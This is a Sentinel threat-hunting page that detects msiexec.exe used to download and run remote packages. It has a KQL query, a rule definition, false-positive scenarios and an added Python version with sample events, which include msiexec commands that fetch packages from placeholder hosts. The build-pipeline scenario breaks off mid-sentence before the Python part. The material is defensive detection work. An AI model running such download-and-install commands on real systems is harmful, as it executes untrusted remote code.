Adversaries may abuse msiexec.exe to execute malicious payloads disguised as legitimate installation files. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential compromise attempts that evade traditional detection methods.
KQL Query
//Find possible download and execution using Msiexec
DeviceProcessEvents
| where Timestamp > ago(7d)
//Msiexec process (case-insensitive match on the image name)
| where FileName =~ "msiexec.exe" and
//Command line references a URL (whole term "http") and the term "return"
(ProcessCommandLine has "http" and ProcessCommandLine has "return")
id: 7a5597de-7e99-470d-944f-acb163b9cb14
name: detect-malicious-use-of-msiexec
description: |
  This query was originally published in the threat analytics report, Msiexec abuse.
  Msiexec.exe is a Windows component that installs files with the .msi extension. These files are Windows installer packages and are used by a wide array of legitimate software. However, malicious actors can repurpose msiexec.exe for living-off-the-land attacks, in which they use legitimate system binaries already present on the compromised device to carry out the attack.
  The following query detects activity associated with misuse of msiexec.exe, particularly alongside mimikatz, a common credential dumper and privilege escalation tool.
  Reference - https://www.varonis.com/blog/what-is-mimikatz/
requiredDataConnectors:
  - connectorId: MicrosoftThreatProtection
    dataTypes:
      - DeviceProcessEvents
tactics:
  - Execution
  - Privilege escalation
  - Credential Access
query: |
  //Find possible download and execution using Msiexec
  DeviceProcessEvents
  | where Timestamp > ago(7d)
  //Msiexec process (case-insensitive match on the image name)
  | where FileName =~ "msiexec.exe" and
  //Command line references a URL (whole term "http") and the term "return"
  (ProcessCommandLine has "http" and ProcessCommandLine has "return")
| Sentinel Table | Notes |
|---|---|
| DeviceProcessEvents | Ensure this data connector is enabled |
Scenario: Scheduled System Maintenance via Group Policy
Description: A legitimate scheduled task uses msiexec.exe to install a system update or patch via a Group Policy Object (GPO).
Filter/Exclusion: Check for the presence of msiexec.exe in the context of a scheduled task with a known GPO or Microsoft update source. Use a filter like:
(Process.parent_process_name : "schtasks.exe") AND (Process.command_line : "msiexec.exe /i")
Scenario: Software Deployment via Microsoft Endpoint Manager (Intune)
Description: IT administrators use Intune to deploy software packages (e.g., Microsoft Office, Adobe Reader) using msiexec.exe.
Filter/Exclusion: Filter by the msiexec.exe command line arguments associated with known enterprise software deployments. Example:
(Process.command_line : "msiexec.exe /i \"C:\\Windows\\Temp\\Office2016.msi\"") AND (Process.user : "ITAdminUser")
Scenario: Admin Task to Install a Legitimate MSI Package
Description: An administrator manually installs a legitimate MSI package (e.g., Adobe Acrobat Reader, Java Runtime) using msiexec.exe.
Filter/Exclusion: Filter by the presence of a known legitimate MSI package path or use a whitelist of allowed MSI files. Example:
(Process.command_line : "msiexec.exe /i \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.msi\"")
Scenario: Use of msiexec.exe in a Build Pipeline
Description: A CI/CD pipeline or build server uses msiexec.exe to install
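The hunting query's where-clause and the scheduled-task and allow-list exclusions from the scenarios above, applied to constructed DeviceProcessEvents rows, as an added example that is not part of the original rule or of Sentinel; the event fields used, the allow-lists and the placeholder hostnames are assumptions, and `has_term` is an approximation of KQL `has` semantics.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    # Subset of DeviceProcessEvents columns used by the rule and the exclusions.
    DeviceName: str
    FileName: str
    InitiatingProcessFileName: str
    ProcessCommandLine: str

def has_term(text: str, term: str) -> bool:
    """Approximates KQL `has`: case-insensitive match on a whole alphanumeric term.
    So has "http" matches "http://..." but not "https://..." (contains would widen it)."""
    pattern = r"(?<![A-Za-z0-9_])" + re.escape(term) + r"(?![A-Za-z0-9_])"
    return re.search(pattern, text, re.IGNORECASE) is not None

def matches_msiexec_rule(ev: ProcessEvent) -> bool:
    """The query's filter: FileName =~ "msiexec.exe" and command line has "http" and has "return"."""
    cmd = ev.ProcessCommandLine
    return ev.FileName.lower() == "msiexec.exe" and has_term(cmd, "http") and has_term(cmd, "return")

# Exclusions from the scenarios (their parent_process_name maps to InitiatingProcessFileName,
# command_line to ProcessCommandLine). Both lists are constructed for this example.
BENIGN_PARENTS = {"schtasks.exe"}
ALLOWED_MSI_PATHS = {r"C:\Windows\Temp\Office2016.msi"}

def is_known_benign(ev: ProcessEvent) -> bool:
    if ev.InitiatingProcessFileName.lower() in BENIGN_PARENTS:
        return True
    cmd = ev.ProcessCommandLine.lower()
    return any(path.lower() in cmd for path in ALLOWED_MSI_PATHS)

def hunt(events: list) -> list:
    """Rule hits minus the documented exclusions: the rows an analyst would triage."""
    return [ev for ev in events if matches_msiexec_rule(ev) and not is_known_benign(ev)]

# Constructed sample rows; hostnames are placeholders, not real indicators.
SAMPLE_EVENTS = [
    ProcessEvent("ws-017", "MsiExec.exe", "powershell.exe",
                 "msiexec.exe /q /i http://updates.example.invalid/pkg.php?return=1"),  # hit
    ProcessEvent("srv-gpo-02", "msiexec.exe", "schtasks.exe",
                 "msiexec.exe /i http://deploy.example.invalid/Office2016.msi /qn /l*v C:\\Logs\\return.log"),  # matches, excluded
    ProcessEvent("ws-018", "msiexec.exe", "cmd.exe",
                 "msiexec.exe /q /i https://updates.example.invalid/pkg.php?return=1"),  # missed: "https" is one term
]

if __name__ == "__main__":
    for ev in hunt(SAMPLE_EVENTS):
        print(ev.DeviceName, ev.InitiatingProcessFileName, ev.ProcessCommandLine)
```

The third sample row shows why `has "http"` alone never fires on https URLs; widen the query with `contains` or `has_any` if that coverage is wanted.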